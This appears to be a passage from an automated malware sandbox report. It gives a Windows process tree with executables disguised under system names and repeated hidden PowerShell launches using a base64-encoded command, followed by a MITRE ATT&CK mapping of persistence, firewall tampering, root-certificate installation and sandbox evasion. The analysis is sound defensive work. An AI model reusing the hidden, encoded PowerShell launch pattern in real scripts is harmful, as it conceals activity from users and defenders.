PID:4064

C:\Windows\system32\taskeng.exe
taskeng.exe {927C1F86-8DBD-4678-BC0C-D4314E226B6C} S-1-5-21-2297530677-1229052932-2803917579-1000:HKULBIBU\Admin:Interactive:[1]
1⤵
PID:3572

C:\ProgramData\taskmgr.exe
C:\ProgramData\taskmgr.exe
2⤵
PID:2172

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
2⤵
PID:3512

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Command and Scripting Interpreter: PowerShell
PID:3164

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:4812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Command and Scripting Interpreter: PowerShell
PID:268

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Command and Scripting Interpreter: PowerShell
PID:4324

C:\ProgramData\taskmgr.exe
C:\ProgramData\taskmgr.exe
2⤵
PID:4516

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
2⤵
PID:3420

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:4588

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:4428

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x534
1⤵
PID:2600

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Scheduled Task/Job

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Virtualization/Sandbox Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

Virtualization/Sandbox Evasion